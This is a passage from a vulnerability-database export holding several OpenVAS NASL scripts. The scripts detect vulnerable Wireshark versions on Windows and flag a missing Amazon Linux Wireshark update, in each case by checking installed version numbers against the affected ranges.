Application\";\ntag_affected = \"Wireshark version 1.2.0 through 1.2.15\n Wireshark version 1.4.0 through 1.4.4\";\ntag_insight = \"The flaw is caused by an error in the 'X.509if' dissector when processing\n malformed data, which could be exploited to crash an affected application.\";\ntag_solution = \"Upgrade to the Wireshark version 1.4.5 or 1.2.16 or later,\n For updates refer to http://www.wireshark.org/download.html\";\ntag_summary = \"The host is installed with Wireshark and is prone to denial of\n service vulnerability.\";\n\nif(description)\n{\n script_id(801785);\n script_version(\"$Revision: 7015 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-28 13:51:24 +0200 (Mon, 28 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-16 15:25:30 +0200 (Mon, 16 May 2011)\");\n script_cve_id(\"CVE-2011-1590\");\n script_bugtraq_id(47392);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_name(\"Wireshark X.509if Dissector Denial of service vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id?1025388\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2011/1022\");\n\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_require_keys(\"Wireshark/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Get the version from KB\nwiresharkVer = get_kb_item(\"Wireshark/Win/Ver\");\nif(!wiresharkVer){\n exit(0);\n}\n\n## Check for Wireshark Version\nif(version_in_range(version:wiresharkVer, test_version:\"1.2.0\", test_version2:\"1.2.15\")||\n version_in_range(version:wiresharkVer, test_version:\"1.4.0\", test_version2:\"1.4.4\")){\n security_message(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:13", "description": "This host is installed with Wireshark and is prone to buffer overflow\n vulnerability.", "cvss3": {}, "published": "2010-06-22T00:00:00", "type": "openvas", "title": "Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284"], "modified": "2018-12-04T00:00:00", "id": "OPENVAS:1361412562310902195", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902195", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902195\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2010-2284\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/40112\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1418\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/security/wnpa-sec-2010-05.html\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/security/wnpa-sec-2010-06.html\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2010/06/11/1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_mandatory_keys(\"Wireshark/Win/Ver\");\n script_tag(name:\"impact\", value:\"It has unknown impact and remote attack vectors.\");\n script_tag(name:\"affected\", value:\"Wireshark version 0.10.13 to 1.0.13 and 1.2.0 to 1.2.8 on windows.\");\n script_tag(name:\"insight\", value:\"The flaw is caused by a buffer overflow error within the 'ASN.1 BER' dissector.\");\n script_tag(name:\"solution\", value:\"Upgrade to Wireshark version 1.0.14 or 1.2.9:\");\n script_tag(name:\"summary\", value:\"This host is installed with Wireshark and is prone to buffer overflow\n vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/download.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsharkVer = get_kb_item(\"Wireshark/Win/Ver\");\nif(!sharkVer){\n exit(0);\n}\n\nif(version_in_range(version:sharkVer, test_version:\"1.2.0\", test_version2:\"1.2.8\") ||\n version_in_range(version:sharkVer, test_version:\"0.10.13\", test_version2:\"1.0.13\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:56", "description": "This host is installed with Wireshark and is prone to buffer overflow\n vulnerability.", "cvss3": {}, "published": "2010-06-22T00:00:00", "type": "openvas", "title": "Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2284"], "modified": "2017-02-23T00:00:00", "id": "OPENVAS:902195", "href": "http://plugins.openvas.org/nasl.php?oid=902195", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_wireshark_asn_ber_dissector_bof_vuln_win.nasl 5401 2017-02-23 09:46:07Z teissa $\n#\n# Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"It has unknown impact and remote attack vectors.\n Impact Level: Application\";\ntag_affected = \"Wireshark version 0.10.13 to 1.0.13 and 1.2.0 to 1.2.8 on windows.\";\ntag_insight = \"The flaw is caused by a buffer overflow error within the 'ASN.1 BER' dissector.\";\ntag_solution = \"Upgrade to Wireshark version 1.0.14 or 1.2.9:\n For updates refer to http://www.wireshark.org/download.html\";\ntag_summary = \"This host is installed with Wireshark and is prone to buffer overflow\n vulnerability.\";\n\nif(description)\n{\n script_id(902195);\n script_version(\"$Revision: 5401 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-23 10:46:07 +0100 (Thu, 23 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2010-2284\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Wireshark ASN.1 BER Dissector Buffer Overflow Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/40112\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1418\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/security/wnpa-sec-2010-05.html\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/security/wnpa-sec-2010-06.html\");\n script_xref(name : \"URL\" , value : \"http://www.openwall.com/lists/oss-security/2010/06/11/1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_require_keys(\"Wireshark/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsharkVer = get_kb_item(\"Wireshark/Win/Ver\");\nif(!sharkVer){\n exit(0);\n}\n\n# Grep for Wireshark version\nif(version_in_range(version:sharkVer, test_version:\"1.2.0\", test_version2:\"1.2.8\") ||\n version_in_range(version:sharkVer, test_version:\"0.10.13\", test_version2:\"1.0.13\")){\n security_message(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:06", "description": "This host is installed with Wireshark and is prone to buffer overflow\n vulnerability.", "cvss3": {}, "published": "2010-06-22T00:00:00", "type": "openvas", "title": "Wireshark SigComp Universal Decompressor Virtual Machine dissector BOF Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2287"], "modified": "2018-12-04T00:00:00", "id": "OPENVAS:1361412562310902199", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902199", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Wireshark SigComp Universal Decompressor Virtual Machine dissector BOF Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902199\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2010-2287\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Wireshark SigComp Universal Decompressor Virtual Machine dissector BOF Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/40112\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1418\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/security/wnpa-sec-2010-05.html\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/security/wnpa-sec-2010-06.html\");\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2010/06/11/1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_mandatory_keys(\"Wireshark/Win/Ver\");\n script_tag(name:\"impact\", value:\"It has unknown impact and remote attack vectors.\");\n script_tag(name:\"affected\", value:\"Wireshark version 0.10.8 to 1.0.13 and 1.2.0 to 1.2.8\");\n script_tag(name:\"insight\", value:\"The flaw is due to a buffer overflow error in the SigComp Universal\n Decompressor Virtual Machine dissector.\");\n script_tag(name:\"solution\", value:\"Upgrade to Wireshark version 1.0.14 or 1.2.9:\");\n script_tag(name:\"summary\", value:\"This host is installed with Wireshark and is prone to buffer overflow\n vulnerability.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/download.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsharkVer = get_kb_item(\"Wireshark/Win/Ver\");\nif(!sharkVer){\n exit(0);\n}\n\nif(version_in_range(version:sharkVer, test_version:\"1.2.0\", test_version2:\"1.2.8\") ||\n version_in_range(version:sharkVer, test_version:\"0.10.8\", test_version2:\"1.0.13\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:10:01", "description": "This host is installed with Wireshark and is prone to buffer overflow\n vulnerability.", "cvss3": {}, "published": "2010-06-22T00:00:00", "type": "openvas", "title": "Wireshark SigComp Universal Decompressor Virtual Machine dissector BOF Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2287"], "modified": "2017-02-23T00:00:00", "id": "OPENVAS:902199", "href": "http://plugins.openvas.org/nasl.php?oid=902199", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_wireshark_sigcomp_dissector_bof_vuln_win.nasl 5401 2017-02-23 09:46:07Z teissa $\n#\n# Wireshark SigComp Universal Decompressor Virtual Machine dissector BOF Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"It has unknown impact and remote attack vectors.\n Impact Level: Application\";\ntag_affected = \"Wireshark version 0.10.8 to 1.0.13 and 1.2.0 to 1.2.8\";\ntag_insight = \"The flaw is due to a buffer overflow error in the SigComp Universal\n Decompressor Virtual Machine dissector.\";\ntag_solution = \"Upgrade to Wireshark version 1.0.14 or 1.2.9:\n For updates refer to http://www.wireshark.org/download.html\";\ntag_summary = \"This host is installed with Wireshark and is prone to buffer overflow\n vulnerability.\";\n\nif(description)\n{\n script_id(902199);\n script_version(\"$Revision: 5401 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-23 10:46:07 +0100 (Thu, 23 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2010-2287\");\n script_tag(name:\"cvss_base\", value:\"8.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Wireshark SigComp Universal Decompressor Virtual Machine dissector BOF Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/40112\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1418\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/security/wnpa-sec-2010-05.html\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/security/wnpa-sec-2010-06.html\");\n script_xref(name : \"URL\" , value : \"http://www.openwall.com/lists/oss-security/2010/06/11/1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_require_keys(\"Wireshark/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsharkVer = get_kb_item(\"Wireshark/Win/Ver\");\nif(!sharkVer){\n exit(0);\n}\n\n# Check for Wireshark version\nif(version_in_range(version:sharkVer, test_version:\"1.2.0\", test_version2:\"1.2.8\") ||\n version_in_range(version:sharkVer, test_version:\"0.10.8\", test_version2:\"1.0.13\")){\n security_message(0);\n}\n", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-04T14:20:06", "description": "The host is installed with Wireshark and is prone to Denial of\n Service and buffer overflow vulnerabilities.", "cvss3": {}, "published": "2011-05-16T00:00:00", "type": "openvas", "title": "Wireshark Denial of Service and Buffer Overflow Vulnerabilities (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1592", "CVE-2011-1591"], "modified": "2017-08-31T00:00:00", "id": "OPENVAS:801786", "href": "http://plugins.openvas.org/nasl.php?oid=801786", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_wireshark_mult_vuln_win_may11.nasl 7029 2017-08-31 11:51:40Z teissa $\n#\n# Wireshark Denial of Service and Buffer Overflow Vulnerabilities (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to overflow a buffer and\n execute arbitrary code on the system or cause the application to crash.\n Impact Level: Application\";\ntag_affected = \"Wireshark version 1.4.0 through 1.4.4\";\ntag_insight = \"The flaws are due to:\n - a buffer overflow error in the 'DECT' dissector when processing malformed\n data, which could allow code execution via malformed packets or a malicious\n PCAP file.\n - an error in the 'NFS' dissector when processing malformed data, which could\n be exploited to crash an affected application.\";\ntag_solution = \"Upgrade to the Wireshark version 1.4.5 or later,\n For updates refer to http://www.wireshark.org/download.html\";\ntag_summary = \"The host is installed with Wireshark and is prone to Denial of\n Service and buffer overflow vulnerabilities.\";\n\nif(description)\n{\n script_id(801786);\n script_version(\"$Revision: 7029 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-31 13:51:40 +0200 (Thu, 31 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-16 15:25:30 +0200 (Mon, 16 May 2011)\");\n script_cve_id(\"CVE-2011-1591\", \"CVE-2011-1592\");\n script_bugtraq_id(47392);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Wireshark Denial of Service and Buffer Overflow Vulnerabilities (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/44172\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/66834\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2011/1022\");\n script_xref(name : \"URL\" , value : \"http://www.wireshark.org/security/wnpa-sec-2011-06.html\");\n\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_family(\"General\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_require_keys(\"Wireshark/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Get the version from KB\nwiresharkVer = get_kb_item(\"Wireshark/Win/Ver\");\nif(!wiresharkVer){\n exit(0);\n}\n\n## Check for Wireshark Version\nif(version_in_range(version:wiresharkVer, test_version:\"1.4.0\", test_version2:\"1.4.4\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-27T19:22:35", "description": "The host is installed with Wireshark and is prone to Denial of\n Service and buffer overflow vulnerabilities.", "cvss3": {}, "published": "2011-05-16T00:00:00", "type": "openvas", "title": "Wireshark Denial of Service and Buffer Overflow Vulnerabilities (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1592", "CVE-2011-1591"], "modified": "2020-04-23T00:00:00", "id": "OPENVAS:1361412562310801786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801786", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Wireshark Denial of Service and Buffer Overflow Vulnerabilities (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801786\");\n script_version(\"2020-04-23T08:43:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 08:43:39 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-05-16 15:25:30 +0200 (Mon, 16 May 2011)\");\n script_cve_id(\"CVE-2011-1591\", \"CVE-2011-1592\");\n script_bugtraq_id(47392);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Wireshark Denial of Service and Buffer Overflow Vulnerabilities (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/44172\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/66834\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2011/1022\");\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/security/wnpa-sec-2011-06.html\");\n\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_family(\"General\");\n script_dependencies(\"gb_wireshark_detect_win.nasl\");\n script_mandatory_keys(\"Wireshark/Win/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to overflow a buffer and\n execute arbitrary code on the system or cause the application to crash.\");\n script_tag(name:\"affected\", value:\"Wireshark version 1.4.0 through 1.4.4\");\n script_tag(name:\"insight\", value:\"The flaws are due to:\n\n - a buffer overflow error in the 'DECT' dissector when processing malformed\n data, which could allow code execution via malformed packets or a malicious\n PCAP file.\n\n - an error in the 'NFS' dissector when processing malformed data, which could\n be exploited to crash an affected application.\");\n script_tag(name:\"solution\", value:\"Upgrade to the Wireshark version 1.4.5 or later.\");\n script_tag(name:\"summary\", value:\"The host is installed with Wireshark and is prone to Denial of\n Service and buffer overflow vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.wireshark.org/download.html\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nwiresharkVer = get_kb_item(\"Wireshark/Win/Ver\");\nif(!wiresharkVer){\n exit(0);\n}\n\nif(version_in_range(version:wiresharkVer, test_version:\"1.4.0\", test_version2:\"1.4.4\")){\n report = report_fixed_ver(installed_version:wiresharkVer, vulnerable_range:\"1.4.0 - 1.4.4\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:03:12", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2012-71)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1590", "CVE-2011-1143"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120149", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120149", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120149\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:18:39 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2012-71)\");\n script_tag(name:\"insight\", value:\"Several flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.\");\n script_tag(name:\"solution\", value:\"Run yum update wireshark to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-71.html\");\n script_cve_id(\"CVE-2011-1143\", \"CVE-2011-1590\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"wireshark-devel\", rpm:\"wireshark-devel~1.2.15~2.10.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"wireshark\", rpm:\"wireshark~1.2.15~2.10.amzn1\", 